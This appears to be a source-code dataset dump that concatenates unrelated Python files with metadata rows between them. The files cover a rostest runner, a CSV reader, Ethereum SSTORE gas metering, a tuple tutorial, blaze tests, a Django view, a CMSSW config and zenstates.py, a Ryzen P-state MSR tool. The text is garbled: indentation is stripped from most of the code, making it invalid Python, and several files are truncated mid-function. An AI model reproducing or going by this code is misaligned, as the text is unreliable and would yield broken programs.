XML_OUTPUT_FLAG = '--gtest_output=xml:' #use gtest-compatible flag
test.args = "%s %s%s" % (test.args, XML_OUTPUT_FLAG, test_file)
if _textMode:
test.output = 'screen'
test.args = test.args + " --text"
# run the test, blocks until completion
printlog("running test %s" % test_name)
timeout_failure = False
try:
self.test_parent.run_test(test)
except roslaunch.launch.RLTestTimeoutException:
if test.retry:
timeout_failure = True
else:
raise
if not timeout_failure:
printlog("test [%s] finished" % test_name)
else:
printlogerr("test [%s] timed out" % test_name)
# load in test_file
if not _textMode or timeout_failure:
if not timeout_failure:
self.assert_(
os.path.isfile(test_file),
"test [%s] did not generate test results" % test_name)
printlog("test [%s] results are in [%s]", test_name,
test_file)
results = rosunit.junitxml.read(test_file, test_name)
test_fail = results.num_errors or results.num_failures
else:
test_fail = True
if test.retry > 0 and test_fail:
test.retry -= 1
printlog("test [%s] failed, retrying. Retries left: %s" %
(test_name, test.retry))
self.tearDown()
self.setUp()
else:
done = True
_accumulateResults(results)
printlog(
"test [%s] results summary: %s errors, %s failures, %s tests",
test_name, results.num_errors, results.num_failures,
results.num_tests)
else:
if test.retry:
printlogerr("retry is disabled in --text mode")
done = True
printlog("[ROSTEST] test [%s] done", test_name)
return fn
## Function that becomes TestCase.setup()
def setUp(self):
# new test_parent for each run. we are a bit inefficient as it would be possible to
# reuse the roslaunch base infrastructure for each test, but the roslaunch code
# is not abstracted well enough yet
self.test_parent = ROSTestLaunchParent(self.config, [self.test_file],
reuse_master=self.reuse_master,
clear=self.clear)
printlog("setup[%s] run_id[%s] starting", self.test_file,
self.test_parent.run_id)
self.test_parent.setUp()
# the config attribute makes it easy for tests to access the ROSLaunchConfig instance
self.config = self.test_parent.config
_addRostestParent(self.test_parent)
printlog("setup[%s] run_id[%s] done", self.test_file,
self.test_parent.run_id)
## Function that becomes TestCase.tearDown()
def tearDown(self):
printlog("tearDown[%s]", self.test_file)
if self.test_parent:
self.test_parent.tearDown()
printlog("rostest teardown %s complete", self.test_file)
def createUnitTest(test_file,
reuse_master=False,
clear=False,
results_base_dir=None):
"""
Unit test factory. Constructs a unittest class based on the roslaunch
@param test_file: rostest filename
@type test_file: str
"""
# parse the config to find the test files
config = roslaunch.config.load_config_default([test_file], None)
# pass in config to class as a property so that test_parent can be initialized
classdict = {
'setUp': setUp,
'tearDown': tearDown,
'config': config,
'test_parent': None,
'test_file': test_file,
'reuse_master': reuse_master,
'clear': clear
}
# add in the tests
testNames = []
for test in config.tests:
# #1989: find test first to make sure it exists and is executable
err_msg = None
node_exists = os.path.isfile(test.type) and os.access(
test.type, os.X_OK)
if not node_exists:
err_msg = "Test node {} does not exist".format(test.type)
testName = 'test%s' % (test.test_name)
if err_msg:
classdict[testName] = failRunner(test.test_name, err_msg)
elif testName in testNames:
classdict[testName] = failDuplicateRunner(test.test_name)
else:
classdict[testName] = rostestRunner(
test, results_base_dir=results_base_dir)
testNames.append(testName)
# build the TestCase subclass from our dynamically created test methods
return type('RosTest', (unittest.TestCase,), classdict)
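# The `type()` call above is the standard way to build a unittest.TestCase
# subclass at runtime from a dict of generated test methods. A minimal,
# self-contained sketch of the same technique (names here are illustrative,
# not part of rostest):
#
#   import unittest
#
#   def make_test(value):
#       def fn(self):
#           self.assertGreater(value, 0)
#       return fn
#
#   classdict = {'test_one': make_test(1), 'test_two': make_test(2)}
#   DynamicCase = type('DynamicCase', (unittest.TestCase,), classdict)
#   # unittest's loader now discovers test_one and test_two on DynamicCase.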
| 33.793103
| 116
| 0.634184
|
4adfe58dd650c33518a3baf9cca110c295de15f5
| 2,280
|
py
|
Python
|
server/opendp_apps/profiler/csv_reader.py
|
mikephelan/opendp-ux
|
80c65da0ed17adc01c69b05dbc9cbf3a5973a016
|
[
"MIT"
] | 6
|
2021-05-25T18:50:58.000Z
|
2022-03-23T19:52:15.000Z
|
server/opendp_apps/profiler/csv_reader.py
|
mikephelan/opendp-ux
|
80c65da0ed17adc01c69b05dbc9cbf3a5973a016
|
[
"MIT"
] | 298
|
2021-05-19T17:34:09.000Z
|
2022-03-29T18:45:22.000Z
|
server/opendp_apps/profiler/csv_reader.py
|
opendp/dpcreator
|
6ba3c58ecdcd81ca1f4533a14ce7604eccf6a646
|
[
"MIT"
] | null | null | null |
from django.conf import settings
import csv
import pandas as pd
from opendp_apps.profiler import static_vals as pstatic
# NOTE: err_resp is used in read() below but was not imported in this file;
# the import path here is an assumption based on the project's usual helpers.
from opendp_apps.model_helpers.basic_response import err_resp
class DelimiterNotFoundException(Exception):
"""
This exception should be raised when a file does not have a clear
delimiter (empty, corrupted, etc.)
"""
pass
class ColumnLimitInvalid(Exception):
"""
The column limit may be None or an integer > 0
"""
pass
class CsvReader:
def __init__(self, filepath, column_limit=None):
"""
Utility for reading a delimited file into a dataframe,
with automatic delimiter detection
:param filepath: File to read from
:param column_limit: If passed, only return the first N columns in the dataframe
"""
self.filepath = filepath
self.delimiter = None
self.column_limit = column_limit
if self.column_limit is not None:
if not isinstance(self.column_limit, int):
raise ColumnLimitInvalid(f'{pstatic.ERR_MSG_COLUMN_LIMIT} Found: "{self.column_limit}"')
if self.column_limit < 1:
raise ColumnLimitInvalid(f'{pstatic.ERR_MSG_COLUMN_LIMIT} Found: "{self.column_limit}"')
def read(self):
"""
Build the dataframe
:return: pd.DataFrame
"""
sniffer = csv.Sniffer()
try:
with open(self.filepath, mode='r', encoding='utf-8') as infile:
dialect = sniffer.sniff(infile.readline())
self.delimiter = dialect.delimiter
df = pd.read_csv(self.filepath, delimiter=self.delimiter)
if self.column_limit:
return df[df.columns[:self.column_limit]]
return df
except pd.errors.EmptyDataError as err_obj:
user_msg = f'{pstatic.ERR_FAILED_TO_READ_DATASET} (EmptyDataError: {err_obj})'
return err_resp(user_msg)
except pd.errors.ParserError as err_obj:
user_msg = f'{pstatic.ERR_FAILED_TO_READ_DATASET} (ParserError: {err_obj})'
return err_resp(user_msg)
except UnicodeDecodeError as ex:
raise ex
except csv.Error as ex:
if self.delimiter is None:
raise DelimiterNotFoundException()
raise ex
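# Example usage (a sketch; the file path below is a placeholder):
#
#   reader = CsvReader('/tmp/example.tsv', column_limit=3)
#   df = reader.read()          # delimiter sniffed from the first line
#   print(reader.delimiter)     # e.g. '\t'
#   print(df.shape)             # at most 3 columns are returned
#
# Note that for empty or unparsable files read() returns an error response
# (err_resp) rather than raising, so callers should check the return type.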
| 34.029851
| 104
| 0.628509
|
a19be96d7df57cc36b0dfe12ba3db4b6be3acdc1
| 2,125
|
py
|
Python
|
eth/vm/forks/constantinople/storage.py
|
jmcph4/py-evm
|
0cd3ebac9c7c336b07f2f52c52b069fbe400bcef
|
[
"MIT"
] | null | null | null |
eth/vm/forks/constantinople/storage.py
|
jmcph4/py-evm
|
0cd3ebac9c7c336b07f2f52c52b069fbe400bcef
|
[
"MIT"
] | null | null | null |
eth/vm/forks/constantinople/storage.py
|
jmcph4/py-evm
|
0cd3ebac9c7c336b07f2f52c52b069fbe400bcef
|
[
"MIT"
] | null | null | null |
from eth_utils import (
encode_hex,
)
from eth.constants import (
UINT256
)
from eth.vm.computation import BaseComputation
from eth.vm.forks.constantinople import (
constants
)
def sstore_eip1283(computation: BaseComputation) -> None:
slot, value = computation.stack_pop(num_items=2, type_hint=UINT256)
current_value = computation.state.get_storage(
address=computation.msg.storage_address,
slot=slot,
)
original_value = computation.state.get_storage(
address=computation.msg.storage_address,
slot=slot,
from_journal=False
)
gas_refund = 0
if current_value == value:
gas_cost = constants.GAS_SSTORE_EIP1283_NOOP
else:
if original_value == current_value:
if original_value == 0:
gas_cost = constants.GAS_SSTORE_EIP1283_INIT
else:
gas_cost = constants.GAS_SSTORE_EIP1283_CLEAN
if value == 0:
gas_refund += constants.GAS_SSTORE_EIP1283_CLEAR_REFUND
else:
gas_cost = constants.GAS_SSTORE_EIP1283_NOOP
if original_value != 0:
if current_value == 0:
gas_refund -= constants.GAS_SSTORE_EIP1283_CLEAR_REFUND
if value == 0:
gas_refund += constants.GAS_SSTORE_EIP1283_CLEAR_REFUND
if original_value == value:
if original_value == 0:
gas_refund += constants.GAS_SSTORE_EIP1283_RESET_CLEAR_REFUND
else:
gas_refund += constants.GAS_SSTORE_EIP1283_RESET_REFUND
computation.consume_gas(
gas_cost,
reason="SSTORE: {0}[{1}] -> {2} (current: {3} / original: {4})".format(
encode_hex(computation.msg.storage_address),
slot,
value,
current_value,
original_value,
)
)
if gas_refund:
computation.refund_gas(gas_refund)
computation.state.set_storage(
address=computation.msg.storage_address,
slot=slot,
value=value,
)
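# Worked examples of the EIP-1283 metering above (constant names as defined in
# this fork's `constants` module; concrete gas amounts omitted):
#   original == current == 0, new value == 5
#       -> gas_cost = GAS_SSTORE_EIP1283_INIT, no refund (fresh slot being set)
#   original == current == 7, new value == 0
#       -> gas_cost = GAS_SSTORE_EIP1283_CLEAN,
#          gas_refund += GAS_SSTORE_EIP1283_CLEAR_REFUND
#   original == 7, current == 0 (already changed earlier in the tx), new value == 7
#       -> gas_cost = GAS_SSTORE_EIP1283_NOOP,
#          gas_refund -= GAS_SSTORE_EIP1283_CLEAR_REFUND,
#          gas_refund += GAS_SSTORE_EIP1283_RESET_REFUND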
| 27.960526
| 81
| 0.608941
|
ca2eb83e1f99d270e091efc168b9d130766736ea
| 1,002
|
py
|
Python
|
Esercizi01/08-RappBinary.py
|
AmadeusZhang/Corso-Python-IngMat
|
b1bf0156284e3a65e7451fc8547ceb69092b7894
|
[
"MIT"
] | null | null | null |
Esercizi01/08-RappBinary.py
|
AmadeusZhang/Corso-Python-IngMat
|
b1bf0156284e3a65e7451fc8547ceb69092b7894
|
[
"MIT"
] | null | null | null |
Esercizi01/08-RappBinary.py
|
AmadeusZhang/Corso-Python-IngMat
|
b1bf0156284e3a65e7451fc8547ceb69092b7894
|
[
"MIT"
] | null | null | null |
"""
Created on Sun Mar 20 22:24:41 2022
@author: zhzj
Given a positive integer Q, print its representation in natural (unsigned) binary, also indicating the minimum number of bits used.
The program should behave as in the following example:
Input: 19 in decimale
Output: con 5 bit = 10011 in binario.
"""
num = int( input("Inserisci un numero intero naturale in decimale: ") )
if num > 0 :
rapp = ''
# find the max index
ii = 0
while num >= 2**ii : # note: min(2**ii) = 1, so num = 0 needs to be handled separately
ii = ii+1
max_i = ii
ii = ii-1
while ii >= 0 :
if num >= 2**ii :
rapp = rapp + '1'
num = num - 2**ii
else :
rapp = rapp + '0'
ii = ii-1
print("con", max_i, "bit =", rapp, "in binario.")
elif num == 0 :
print('0')
else :
print("Numero non valido")
'''
To-Do: cannot properly handle input = 0 (edge case, and maybe the only one)
'''
| 23.302326
| 132
| 0.592814
|
84345171ddd2de8be3bd39ec02e5c7cf618f722b
| 4,085
|
py
|
Python
|
blaze/compute/tests/test_core_compute.py
|
jreback/blaze
|
85c39335cac4ef7f2921a7f621bc13525880fc44
|
[
"BSD-3-Clause"
] | 1
|
2015-05-17T23:17:12.000Z
|
2015-05-17T23:17:12.000Z
|
blaze/compute/tests/test_core_compute.py
|
jreback/blaze
|
85c39335cac4ef7f2921a7f621bc13525880fc44
|
[
"BSD-3-Clause"
] | null | null | null |
blaze/compute/tests/test_core_compute.py
|
jreback/blaze
|
85c39335cac4ef7f2921a7f621bc13525880fc44
|
[
"BSD-3-Clause"
] | null | null | null |
from __future__ import absolute_import, division, print_function
import pytest
from datashape import discover, dshape, coretypes as ct
from blaze.compute.core import (compute_up, compute, bottom_up_until_type_break,
top_then_bottom_then_top_again_etc,
swap_resources_into_scope)
from blaze.expr import by, symbol, Expr, Symbol, Reduction
from blaze.dispatch import dispatch
from blaze.compatibility import raises
from blaze.utils import example
import pandas as pd
import numpy as np
def test_errors():
t = symbol('t', 'var * {foo: int}')
with raises(NotImplementedError):
compute_up(by(t, count=t.count()), 1)
def test_optimize():
class Foo(object):
pass
s = symbol('s', '5 * {x: int, y: int}')
@dispatch(Expr, Foo)
def compute_down(expr, foo):
return str(expr)
assert compute(s.x * 2, Foo()) == "s.x * 2"
@dispatch(Expr, Foo)
def optimize(expr, foo):
return expr + 1
assert compute(s.x * 2, Foo()) == "(s.x * 2) + 1"
def test_bottom_up_until_type_break():
s = symbol('s', 'var * {name: string, amount: int}')
data = np.array([('Alice', 100), ('Bob', 200), ('Charlie', 300)],
dtype=[('name', 'S7'), ('amount', 'i4')])
e = (s.amount + 1).distinct()
expr, scope = bottom_up_until_type_break(e, {s: data})
amount = symbol('amount', 'var * real', token=1)
assert expr.isidentical(amount)
assert len(scope) == 1
assert amount in scope
assert (scope[amount] == np.array([101, 201, 301], dtype='i4')).all()
# This computation has a type change midstream, so we stop and get the
# unfinished computation.
e = s.amount.sum() + 1
expr, scope = bottom_up_until_type_break(e, {s: data})
amount_sum = symbol('amount_sum', 'int')
assert expr.isidentical(amount_sum + 1)
assert len(scope) == 1
assert amount_sum in scope
assert scope[amount_sum] == 600
# ensure that we work on binops with one child
x = symbol('x', 'real')
expr, scope = bottom_up_until_type_break(x + x, {x: 1})
assert len(scope) == 1
x2 = list(scope.keys())[0]
assert isinstance(x2, Symbol)
assert isinstance(expr, Symbol)
assert scope[x2] == 2
def test_top_then_bottom_then_top_again_etc():
s = symbol('s', 'var * {name: string, amount: int}')
data = np.array([('Alice', 100), ('Bob', 200), ('Charlie', 300)],
dtype=[('name', 'S7'), ('amount', 'i4')])
e = s.amount.sum() + 1
assert top_then_bottom_then_top_again_etc(e, {s: data}) == 601
def test_swap_resources_into_scope():
from blaze import Data
t = Data([1, 2, 3], dshape='3 * int', name='t')
expr, scope = swap_resources_into_scope(t.head(2), {t: t.data})
assert t._resources()
assert not expr._resources()
assert t not in scope
def test_compute_up_on_dict():
d = {'a': [1, 2, 3], 'b': [4, 5, 6]}
assert str(discover(d)) == str(dshape('{a: 3 * int64, b: 3 * int64}'))
s = symbol('s', discover(d))
assert compute(s.a, {s: d}) == [1, 2, 3]
def test_pre_compute_on_multiple_datasets_is_selective():
from into import CSV
from blaze import Data
from blaze.cached import CachedDataset
df = pd.DataFrame([[1, 'Alice', 100],
[2, 'Bob', -200],
[3, 'Charlie', 300],
[4, 'Denis', 400],
[5, 'Edith', -500]], columns=['id', 'name', 'amount'])
iris = CSV(example('iris.csv'))
dset = CachedDataset({'df': df, 'iris': iris})
d = Data(dset)
assert str(compute(d.df.amount)) == str(df.amount)
def test_raises_on_valid_expression_but_no_implementation():
class MyExpr(Expr):
__slots__ = '_hash', '_child'
@property
def dshape(self):
return self._child.dshape
t = symbol('t', 'var * {amount: real}')
expr = MyExpr(t.amount)
df = [(1.0,), (2.0,), (3.0,)]
with pytest.raises(NotImplementedError):
compute(expr, df)
| 29.178571
| 80
| 0.595594
|
a2bcd83597a67aca05692d36440397574609444f
| 953
|
py
|
Python
|
www/tests/test_aio.py
|
stefanhoelzl/brython
|
433d272e7bb0e3c0994392f8f265bc39e87854f7
|
[
"BSD-3-Clause"
] | 1
|
2018-10-12T12:29:14.000Z
|
2018-10-12T12:29:14.000Z
|
www/tests/test_aio.py
|
SungBeom/BBAM_Brython
|
107036ad20a94af1d43e5ce5bd7c73e6a470d687
|
[
"BSD-3-Clause"
] | null | null | null |
www/tests/test_aio.py
|
SungBeom/BBAM_Brython
|
107036ad20a94af1d43e5ce5bd7c73e6a470d687
|
[
"BSD-3-Clause"
] | null | null | null |
from browser import console
import asyncio
async def wait_secs(s, result):
await asyncio.sleep(s)
console.log("Returning result", result)
return result
@aio.async_test(0.5)
def test_simple_coroutine():
console.log("coro_wait_secs")
coro_wait_secs = wait_secs(0.1, 10)
console.log("ensuring future")
fut = asyncio.ensure_future(coro_wait_secs)
console.log("asserting")
assert asyncio.iscoroutine(coro_wait_secs), "Result of running a coroutine function should be a coroutine object"
assert asyncio.iscoroutinefunction(wait_secs), "asyncio.coroutine decorator should return a coroutine function"
assert isinstance(fut, asyncio.Future), "ensure_future should return a future"
console.log("yielding")
result = yield from fut
console.log("asserting")
assert fut.result() == result, "yield from future should return its result"
assert result == 10, "Future result different from expected"
| 34.035714
| 117
| 0.740818
|
ac2bc5a5b23efafaead655619edbc4b2ad376a01
| 1,605
|
py
|
Python
|
tuplas.py
|
franciscoRic/Aula-Python
|
bc767b2ff22526ad0c3cc4ab51ee5227be9ce399
|
[
"MIT"
] | null | null | null |
tuplas.py
|
franciscoRic/Aula-Python
|
bc767b2ff22526ad0c3cc4ab51ee5227be9ce399
|
[
"MIT"
] | null | null | null |
tuplas.py
|
franciscoRic/Aula-Python
|
bc767b2ff22526ad0c3cc4ab51ee5227be9ce399
|
[
"MIT"
] | null | null | null |
"""
# Tuples are written with parentheses ()
tupla1 = (1, 2, 3, 4, 5, 6)
print(tupla1)
print(type(tupla1))
tupla2 = 1, 2, 3, 4, 5, 6
print(tupla1)
print(type(tupla2))
# Tuples must have more than one element.
# Not a tuple
tupla3 = (4)
print(tupla3)
print(type(tupla3))
tupla4 = (4,) # This is a tuple
print(tupla4)
print(type(tupla4))
tupla5 = 4,
print(tupla5)
print(type(tupla5))
tupla = tuple(range(11))
print(tupla)
print(type(tupla))
# Tuple unpacking
tupla = ('Francisco Ricardo', 'Analista de sistemas')
escola, curso = tupla
print(escola)
print(curso)
# Methods to add or remove elements do not exist for tuples, since they are immutable.
# With tuples we can still use sum, max, min and len
tupla = (1, 2, 3, 4, 5)
print(sum(tupla))
print(max(tupla))
print(min(tupla))
print(len(tupla))
# Tuple concatenation
tupla1 = 1, 2, 3
print(tupla1)
tupla2 = (4, 5, 6)
print(tupla2)
print(tupla1 + tupla2)
print(tupla1)
print(tupla2)
# CHECK WHETHER A GIVEN ELEMENT IS IN A TUPLE
tupla = 1, 2, 3,
print(3 in tupla)
# Iterating over a tuple
tupla = 1, 2, 3, 3
for n in tupla:
print(n)
for indice, valor in enumerate(tupla):
print(indice, valor)
# Count elements in a tuple
print(tupla.count(3))
escola = tuple('Francisco Ricardo')
print(escola)
print(escola.count('R'))
# Where to use tuples
mes = ('Janeiro', 'Fevereiro', 'Março')
semana = ('Segunda', 'Terça', 'Quarta')
mes = ('Janeiro', 'Fevereiro', 'Março', 'Abril', 'Maio', 'Junho', 'Julho')
# Iterate with while
i = 0
while i < len(mes):
print(mes[i])
i = i + 1
print(mes[2:5])
"""
| 14.078947
| 87
| 0.666044
|
dd65bcdb3c21bf9f21232b9058064bc9496e5acb
| 171
|
py
|
Python
|
scripts/quest/q29980s.py
|
G00dBye/YYMS
|
1de816fc842b6598d5b4b7896b6ab0ee8f7cdcfb
|
[
"MIT"
] | 54
|
2019-04-16T23:24:48.000Z
|
2021-12-18T11:41:50.000Z
|
scripts/quest/q29980s.py
|
G00dBye/YYMS
|
1de816fc842b6598d5b4b7896b6ab0ee8f7cdcfb
|
[
"MIT"
] | 3
|
2019-05-19T15:19:41.000Z
|
2020-04-27T16:29:16.000Z
|
scripts/quest/q29980s.py
|
G00dBye/YYMS
|
1de816fc842b6598d5b4b7896b6ab0ee8f7cdcfb
|
[
"MIT"
] | 49
|
2020-11-25T23:29:16.000Z
|
2022-03-26T16:20:24.000Z
|
# True Knight of Light
medal = 1142403
if sm.canHold(medal):
sm.chatScript("You have earned a new medal.")
sm.startQuest(parentID)
sm.completeQuest(parentID)
| 21.375
| 49
| 0.71345
|
d82a20c5ebb586b8458d48f2d594f7001c4379c7
| 444
|
py
|
Python
|
blog/migrations/0011_auto_20200703_2039.py
|
joshi008/PenIt-Personal-Blogging-Website
|
5fd3c3422909d0c2bcabdd40aeeec30dce57d009
|
[
"MIT"
] | 2
|
2020-08-02T10:54:39.000Z
|
2020-09-09T19:04:56.000Z
|
blog/migrations/0011_auto_20200703_2039.py
|
joshi008/PenIt-Personal-Blogging-Website
|
5fd3c3422909d0c2bcabdd40aeeec30dce57d009
|
[
"MIT"
] | 8
|
2021-04-08T20:58:47.000Z
|
2022-03-12T00:54:03.000Z
|
blog/migrations/0011_auto_20200703_2039.py
|
joshi008/PenIt-Personal-Blogging-Website
|
5fd3c3422909d0c2bcabdd40aeeec30dce57d009
|
[
"MIT"
] | 1
|
2021-02-27T19:11:31.000Z
|
2021-02-27T19:11:31.000Z
|
# Generated by Django 2.2 on 2020-07-03 15:09
from django.db import migrations
import django_summernote.fields
class Migration(migrations.Migration):
dependencies = [
('blog', '0010_auto_20200603_1818'),
]
operations = [
migrations.AlterField(
model_name='blogpost',
name='content',
field=django_summernote.fields.SummernoteTextField(blank=True, null=True),
),
]
| 22.2
| 86
| 0.641892
|
8bf41417f631d7fe2ae67449f71c6711218db572
| 4,332
|
py
|
Python
|
RecoBTag/ONNXRuntime/python/pfDeepBoostedDiscriminatorsJetTags_cfi.py
|
ckamtsikis/cmssw
|
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
|
[
"Apache-2.0"
] | 852
|
2015-01-11T21:03:51.000Z
|
2022-03-25T21:14:00.000Z
|
RecoBTag/ONNXRuntime/python/pfDeepBoostedDiscriminatorsJetTags_cfi.py
|
ckamtsikis/cmssw
|
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
|
[
"Apache-2.0"
] | 30,371
|
2015-01-02T00:14:40.000Z
|
2022-03-31T23:26:05.000Z
|
RecoBTag/ONNXRuntime/python/pfDeepBoostedDiscriminatorsJetTags_cfi.py
|
ckamtsikis/cmssw
|
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
|
[
"Apache-2.0"
] | 3,240
|
2015-01-02T05:53:18.000Z
|
2022-03-31T17:24:21.000Z
|
import FWCore.ParameterSet.Config as cms
pfDeepBoostedDiscriminatorsJetTags = cms.EDProducer(
'BTagProbabilityToDiscriminator',
discriminators = cms.VPSet(
cms.PSet(
name = cms.string('TvsQCD'),
numerator = cms.VInputTag(
cms.InputTag('pfDeepBoostedJetTags', 'probTbcq'),
cms.InputTag('pfDeepBoostedJetTags', 'probTbqq'),
),
denominator = cms.VInputTag(
cms.InputTag('pfDeepBoostedJetTags', 'probTbcq'),
cms.InputTag('pfDeepBoostedJetTags', 'probTbqq'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDbb'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDcc'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDb'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDc'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDothers'),
),
),
cms.PSet(
name = cms.string('WvsQCD'),
numerator = cms.VInputTag(
cms.InputTag('pfDeepBoostedJetTags', 'probWcq'),
cms.InputTag('pfDeepBoostedJetTags', 'probWqq'),
),
denominator = cms.VInputTag(
cms.InputTag('pfDeepBoostedJetTags', 'probWcq'),
cms.InputTag('pfDeepBoostedJetTags', 'probWqq'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDbb'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDcc'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDb'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDc'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDothers'),
),
),
cms.PSet(
name = cms.string('ZvsQCD'),
numerator = cms.VInputTag(
cms.InputTag('pfDeepBoostedJetTags', 'probZbb'),
cms.InputTag('pfDeepBoostedJetTags', 'probZcc'),
cms.InputTag('pfDeepBoostedJetTags', 'probZqq'),
),
denominator = cms.VInputTag(
cms.InputTag('pfDeepBoostedJetTags', 'probZbb'),
cms.InputTag('pfDeepBoostedJetTags', 'probZcc'),
cms.InputTag('pfDeepBoostedJetTags', 'probZqq'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDbb'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDcc'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDb'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDc'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDothers'),
),
),
cms.PSet(
name = cms.string('ZbbvsQCD'),
numerator = cms.VInputTag(
cms.InputTag('pfDeepBoostedJetTags', 'probZbb'),
),
denominator = cms.VInputTag(
cms.InputTag('pfDeepBoostedJetTags', 'probZbb'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDbb'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDcc'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDb'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDc'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDothers'),
),
),
cms.PSet(
name = cms.string('HbbvsQCD'),
numerator = cms.VInputTag(
cms.InputTag('pfDeepBoostedJetTags', 'probHbb'),
),
denominator = cms.VInputTag(
cms.InputTag('pfDeepBoostedJetTags', 'probHbb'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDbb'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDcc'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDb'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDc'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDothers'),
),
),
cms.PSet(
name = cms.string('H4qvsQCD'),
numerator = cms.VInputTag(
cms.InputTag('pfDeepBoostedJetTags', 'probHqqqq'),
),
denominator = cms.VInputTag(
cms.InputTag('pfDeepBoostedJetTags', 'probHqqqq'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDbb'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDcc'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDb'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDc'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDothers'),
),
),
)
)
| 43.32
| 66
| 0.586334
|
085376138ebed7bdad9d5e0f3f5b08aaa7ef3a59
| 713
|
py
|
Python
|
stinkies/portal/views.py
|
jordan-dimov/stinky-games
|
175c3fa21276456cb1b58703b835f8393f5b2b4a
|
[
"CC0-1.0"
] | null | null | null |
stinkies/portal/views.py
|
jordan-dimov/stinky-games
|
175c3fa21276456cb1b58703b835f8393f5b2b4a
|
[
"CC0-1.0"
] | null | null | null |
stinkies/portal/views.py
|
jordan-dimov/stinky-games
|
175c3fa21276456cb1b58703b835f8393f5b2b4a
|
[
"CC0-1.0"
] | null | null | null |
from django.contrib import messages
from django.shortcuts import render
from django.utils.safestring import mark_safe
from friendship.models import Friend
def homepage_view(request):
context = {
}
if request.user.is_authenticated:
friendship_requests = Friend.objects.requests(request.user)
for frq in friendship_requests:
msg = "{0} wants to be friends with you! <a href='#' id='frq_accept' onclick='accept_frq(\"{1}\");'>Accept</a> | <a id='frq_reject' href='#'>Reject</a>".format(frq.from_user, frq.id)
messages.info(request, mark_safe(msg))
context['frqs'] = friendship_requests
return render(request, "portal/homepage.html", context=context)
| 41.941176
| 194
| 0.69986
|
db9ab3a6b6c72114b91d95dac8ab8b4dc841a1f2
| 4,404
|
py
|
Python
|
zenstates.py
|
fbmoose48/ZenStates-Linux
|
9e76197fdd4b5a969b3af6c0af290f9121691c7f
|
[
"MIT"
] | 437
|
2017-04-21T21:05:07.000Z
|
2022-03-23T13:08:43.000Z
|
zenstates.py
|
musicaudience/ZenStates-Linux
|
0bc27f4740e382f2a2896dc1dabfec1d0ac96818
|
[
"MIT"
] | 14
|
2017-09-25T12:57:18.000Z
|
2021-10-03T04:48:54.000Z
|
zenstates.py
|
musicaudience/ZenStates-Linux
|
0bc27f4740e382f2a2896dc1dabfec1d0ac96818
|
[
"MIT"
] | 60
|
2018-02-03T20:56:47.000Z
|
2022-03-27T07:52:22.000Z
|
#!/usr/bin/python
import struct
import os
import glob
import argparse
pstates = range(0xC0010064, 0xC001006C)
def writemsr(msr, val, cpu = -1):
try:
if cpu == -1:
for c in glob.glob('/dev/cpu/[0-9]*/msr'):
f = os.open(c, os.O_WRONLY)
os.lseek(f, msr, os.SEEK_SET)
os.write(f, struct.pack('Q', val))
os.close(f)
else:
f = os.open('/dev/cpu/%d/msr' % (cpu), os.O_WRONLY)
os.lseek(f, msr, os.SEEK_SET)
os.write(f, struct.pack('Q', val))
os.close(f)
except:
raise OSError("msr module not loaded (run modprobe msr)")
def readmsr(msr, cpu = 0):
try:
f = os.open('/dev/cpu/%d/msr' % cpu, os.O_RDONLY)
os.lseek(f, msr, os.SEEK_SET)
val = struct.unpack('Q', os.read(f, 8))[0]
os.close(f)
return val
except:
raise OSError("msr module not loaded (run modprobe msr)")
def pstate2str(val):
if val & (1 << 63):
fid = val & 0xff
did = (val & 0x3f00) >> 8
vid = (val & 0x3fc000) >> 14
ratio = 25*fid/(12.5 * did)
vcore = 1.55 - 0.00625 * vid
return "Enabled - FID = %X - DID = %X - VID = %X - Ratio = %.2f - vCore = %.5f" % (fid, did, vid, ratio, vcore)
else:
return "Disabled"
def setbits(val, base, length, new):
return (val ^ (val & ((2 ** length - 1) << base))) + (new << base)
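# Example: setbits(0b101101, base=2, length=3, new=0b010) clears bits 2..4
# (currently 0b011) and writes 0b010 there, returning 0b101001 (45 -> 41).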
def setfid(val, new):
return setbits(val, 0, 8, new)
def setdid(val, new):
return setbits(val, 8, 6, new)
def setvid(val, new):
return setbits(val, 14, 8, new)
def hex(x):
return int(x, 16)
parser = argparse.ArgumentParser(description='Sets P-States for Ryzen processors')
parser.add_argument('-l', '--list', action='store_true', help='List all P-States')
parser.add_argument('-p', '--pstate', default=-1, type=int, choices=range(8), help='P-State to set')
parser.add_argument('--enable', action='store_true', help='Enable P-State')
parser.add_argument('--disable', action='store_true', help='Disable P-State')
parser.add_argument('-f', '--fid', default=-1, type=hex, help='FID to set (in hex)')
parser.add_argument('-d', '--did', default=-1, type=hex, help='DID to set (in hex)')
parser.add_argument('-v', '--vid', default=-1, type=hex, help='VID to set (in hex)')
parser.add_argument('--c6-enable', action='store_true', help='Enable C-State C6')
parser.add_argument('--c6-disable', action='store_true', help='Disable C-State C6')
args = parser.parse_args()
if args.list:
for p in range(len(pstates)):
